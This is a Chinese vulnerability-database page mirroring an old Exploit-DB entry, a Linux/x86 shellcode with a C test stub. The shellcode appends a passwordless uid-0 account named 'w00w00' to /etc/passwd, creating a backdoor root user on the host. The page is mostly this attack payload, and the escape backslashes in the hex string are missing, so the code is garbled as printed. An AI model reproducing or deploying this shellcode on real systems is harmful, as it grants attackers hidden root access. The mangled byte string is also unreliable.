Linux/x86 – Add Root User Shellcode (104 bytes)

Linux/x86 – Add Root User Shellcode (104 bytes)

漏洞ID 1054606 漏洞类型
发布时间 2004-09-12 更新时间 2004-09-12
图片[1]-Linux/x86 – Add Root User Shellcode (104 bytes)-安全小百科CVE编号 N/A
图片[2]-Linux/x86 – Add Root User Shellcode (104 bytes)-安全小百科CNNVD-ID N/A
漏洞平台 Linux_x86 CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/13451
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/* 
 * Source to this is pass.s
 * This will append a root line to the passwd file (see the source).
 *
 * Shok (Matt Conover), [email protected]
 */

char shellcode[]=
  "xebx03x5fxebx05xe8xf8xffxffxffx31xdbxb3x35x01xfb"
  "x30xc0x88x43x0bx31xc9x66xb9x41x04x31xd2x66xbaxa4"
  "x01x31xc0xb0x05xcdx80x89xc3x31xc9xb1x41x01xf9x31"
  "xd2xb2x1fx31xc0xb0x04xcdx80x31xc0xb0x01xcdx80x2f"
  "x65x74x63x2fx70x61x73x73x77x64x01x77x30x30x77x30"
  "x30x3ax3ax30x3ax30x3ax77x30x77x30x77x21x3ax2fx3a"
  "x2fx62x69x6ex2fx73x68x0a";

void main()
{

  int *ret;
  
  printf("w00w00!n");
  ret = (int *)&ret + 2;
  (*ret) = (int)shellcode;
}

// milw0rm.com [2004-09-12]

相关推荐: Leafnode fetchnews Client Remote Denial of Service Vulnerability

Leafnode fetchnews Client Remote Denial of Service Vulnerability 漏洞ID 1099626 漏洞类型 Design Error 发布时间 2003-09-04 更新时间 2003-09-04 CV…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享